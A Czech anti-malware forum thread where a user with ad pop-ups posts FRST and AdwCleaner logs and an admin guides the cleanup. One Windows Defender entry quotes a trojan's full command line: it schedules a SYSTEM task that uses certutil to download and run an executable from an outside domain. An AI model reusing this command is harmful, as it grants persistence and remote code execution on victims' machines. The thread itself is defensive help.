FirewallRules: [{4020593E-FA91-4C25-96FD-D5B1353F0BCE}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{C7C67AEC-310E-4B5C-9EB6-5A21BCCE399E}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{E83DB169-47F1-4A9A-9D9C-AC419EE6E1CD}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{5EDBC54C-C446-429F-8C3A-586A14725ED5}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{D9B09C69-0FBB-4B86-A187-7F523BE921BD}] => (Allow) C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe (AVG Technologies USA, LLC -> AVG Technologies)
FirewallRules: [{B4A64F44-B7A6-4440-999A-5FFAAEF842CE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E81F9AC5-5422-4213-958F-C5671008BBC2}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)

==================== Restore Points =========================

21-08-2020 18:30:55 Naplánovaný kontrolní bod
28-08-2020 22:33:27 Naplánovaný kontrolní bod
29-08-2020 18:01:40 Operace obnovení
08-09-2020 17:10:36 Naplánovaný kontrolní bod

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 65536 (0x0000000000010000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 32768 (0x0000000000008000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 16384 (0x0000000000004000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 8192 (0x0000000000002000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 02:09:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (10608,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.


System errors:
=============
Error: (09/11/2020 02:14:35 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: Server {E60687F7-01A1-40AA-86AC-DB1CBF673334} se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 02:14:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 02:12:35 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Služba wuauserv byla ukončena s následující chybou: 
Systém nemůže nalézt uvedený soubor.

Error: (09/11/2020 02:10:04 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 06:52:10 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: Server {E60687F7-01A1-40AA-86AC-DB1CBF673334} se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 06:50:10 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Služba wuauserv byla ukončena s následující chybou: 
Systém nemůže nalézt uvedený soubor.

Error: (09/11/2020 06:50:09 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: Server {E60687F7-01A1-40AA-86AC-DB1CBF673334} se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 06:49:43 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.


Windows Defender:
===================================
Date: 2020-08-29 22:36:38.516
Description: 
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Wacatac.C!ml&threatid=2147749372&enterprise=0
Název: Trojan:Win32/Wacatac.C!ml
ID: 2147749372
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Program Files\M3PY0PHHSX\M3PY0PHHS.exe; file:_C:\Users\Milan\AppData\Local\Temp\acmiqlndjnf\zod1s2pvolq.exe; regkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y; runkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Windows\explorer.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:36:38.513
Description: 
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Hynamer.C!ml&threatid=2147749152&enterprise=0
Název: Trojan:Win32/Hynamer.C!ml
ID: 2147749152
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:36:38.510
Description: 
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Wacatac.DB!ml&threatid=2147757790&enterprise=0
Název: Trojan:Win32/Wacatac.DB!ml
ID: 2147757790
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\lttfjp4yc3u\vujrxhyhkrm.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:36:38.508
Description: 
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Cryptinject!MTB&threatid=2147729037&enterprise=0
Název: Trojan:Win32/Cryptinject!MTB
ID: 2147729037
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\dzekzdxxrlm\ifhvvyy.exe; file:_C:\Users\Milan\AppData\Local\Temp\r04v3ss32nl\ifhvvyy.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Program Files (x86)\oizjd\53280214.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:35:50.832
Description: 
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://bbistrovantonbb.com/app/app.exe C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

CodeIntegrity:
===================================

Date: 2020-09-11 14:25:55.869
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\snxhk.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 14:25:52.828
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 14:25:52.810
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\snxhk.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 14:25:26.164
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 14:25:25.360
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 14:25:25.118
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 14:25:24.701
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 14:25:23.844
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

==================== Memory info =========================== 

BIOS: Award Software International, Inc. F3 07/28/2010
Motherboard: Gigabyte Technology Co., Ltd. GA-770T-D3L
Processor: AMD Athlon(tm) II X2 250 Processor
Percentage of memory in use: 38%
Total physical RAM: 12285.55 MB
Available physical RAM: 7549.64 MB
Total Virtual: 14141.55 MB
Available Virtual: 7726.57 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:476.31 GB) (Free:276.58 GB) NTFS
Drive e: (HDD-1000) (Fixed) (Total:931.51 GB) (Free:737.23 GB) NTFS
Drive f: (ZelenyHDD) (Fixed) (Total:465.76 GB) (Free:28.95 GB) NTFS
Drive g: (Car Mechanic Simulator 2018 Merc) (CDROM) (Total:7.51 GB) (Free:0 GB) UDF

\\?\Volume{5d2f0ce6-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{5d2f0ce6-0000-0000-0000-101a77000000}\ () (Fixed) (Total:0.53 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 476.9 GB) (Disk ID: 5D2F0CE6)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=476.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=543 MB) - (Type=27)

==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 8C19AC0D)

Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: BFAA9354)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118199
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#2 Příspěvek od Rudy »

Zdravím!
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

martybx
Návštěvník
Návštěvník
Příspěvky: 154
Registrován: 26 úno 2007 16:22
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#3 Příspěvek od martybx »

log je prosim zde:

Kód: Vybrat vše

# -------------------------------
# Malwarebytes AdwCleaner 8.0.7.0
# -------------------------------
# Build:    07-22-2020
# Database: 2020-07-20.1 (Local)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    09-11-2020
# Duration: 00:00:05
# OS:       Windows 10 Home
# Cleaned:  22
# Failed:   0


***** [ Services ] *****

Deleted       WCAssistantService

***** [ Folders ] *****

Deleted       C:\Program Files (x86)\DiskFixer
Deleted       C:\Program Files (x86)\Lavasoft\Web Companion
Deleted       C:\Program Files (x86)\MachinerData
Deleted       C:\ProgramData\Application Data\Lavasoft\Web Companion
Deleted       C:\ProgramData\Lavasoft\Web Companion
Deleted       C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft\WebCompanion
Deleted       C:\Users\Milan\AppData\Local\Lavasoft\WEBCOMPANION.EXE_URL_SIQ0LWF3TZGXP2KHFKLLYBK3IDTBEHNG
Deleted       C:\Users\Milan\AppData\Roaming\Lavasoft\Web Companion
Deleted       C:\Windows\rss

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKCU\Software\Lavasoft\Web Companion
Deleted       HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{993F5746-4C15-42BC-99C1-064A1764271B}
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Run|Web Companion
Deleted       HKLM\SOFTWARE\MICROSOFT\Speedycar
Deleted       HKLM\Software\MICROSOFT\TechnologyDesktopnew
Deleted       HKLM\Software\Wow6432Node\Lavasoft\Web Companion
Deleted       HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{a99f66ff-7dd7-4937-89c9-70b6d9568932}|DisplayIcon
Deleted       HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{a99f66ff-7dd7-4937-89c9-70b6d9568932}|DisplayName
Deleted       HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{a99f66ff-7dd7-4937-89c9-70b6d9568932}|UninstallString
Deleted       HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|DiskFixer
Deleted       HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\DiskFixer_is1

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [3443 octets] - [11/09/2020 16:33:29]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########


Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118199
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#4 Příspěvek od Rudy »

OK. Dejte nové logy FRST+Addition.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

martybx
Návštěvník
Návštěvník
Příspěvky: 154
Registrován: 26 úno 2007 16:22
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#5 Příspěvek od martybx »

zde:

Kód: Vybrat vše

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 09-09-2020
Ran by Milan (administrator) on DESKTOP-AJHPLSQ (Gigabyte Technology Co., Ltd. GA-770T-D3L) (11-09-2020 14:27:29)
Running from C:\Users\Milan\Desktop
Loaded Profiles: Milan
Platform: Windows 10 Home Version 1909 18363.1016 (X64) Language: Čeština (Česko)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DTAgent.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DTShellHlp.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\aswEngSrv.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\aswidsagent.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\AVGSvc.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\AVGUI.exe <2>
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\wsc_proxy.exe
(AVG Technologies USA, LLC -> AVG Technologies) C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\AVGBrowserCrashHandler.exe
(AVG Technologies USA, LLC -> AVG Technologies) C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\AVGBrowserCrashHandler64.exe
(LAVASOFT SOFTWARE CANADA INC -> ) C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
(LAVASOFT SOFTWARE CANADA INC -> Lavasoft) C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\Milan\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.8043.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.8043.0_x64__8wekyb3d8bbwe\GameBarFT.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <6>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\NVDisplay.Container.exe <2>
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(philandro Software GmbH -> philandro Software GmbH) C:\Program Files (x86)\AnyDesk\AnyDesk.exe <3>
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\spool\drivers\x64\3\E_YATIUNE.EXE <2>
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe <6>

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AVGUI.exe] => C:\Program Files\AVG\Antivirus\AvLaunch.exe [156808 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646776 2020-03-12] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [DiskFixer] => C:\Program Files (x86)\DiskFixer\DiskFixer.exe [247808 2019-07-04] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [DAEMON Tools Ultra Agent] => C:\Program Files\DAEMON Tools Ultra\DTAgent.exe [451952 2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [90951544 2020-09-08] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIUNE.EXE [416896 2017-09-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [EPLTarget\P0000000000000001] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIUNE.EXE [416896 2017-09-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe [8146520 2020-08-29] (LAVASOFT SOFTWARE CANADA INC -> Lavasoft)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf88-6b63-11ea-bac1-1c6f6553bf1c} - "G:\setup.exe" 
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf90-6b63-11ea-bac1-1c6f6553bf1c} - "H:\setup.exe" 
HKLM\...\Print\Monitors\EPSON L3150 Series 64MonitorBE: C:\WINDOWS\system32\E_YLMBUNE.DLL [184832 2017-07-14] (Microsoft Windows Hardware Compatibility Publisher -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\EpsonNet Print Port: C:\WINDOWS\system32\enppmon.dll [500736 2016-09-14] (SEIKO EPSON CORPORATION) [File not signed]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{48F69C39-1356-4A7B-A899-70E3539D4982}] -> C:\Program Files (x86)\AVG\Browser\Application\85.0.5675.85\Installer\chrmstp.exe [2020-09-10] (AVG Technologies USA, LLC -> AVG Technologies)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2020-03-21]
ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
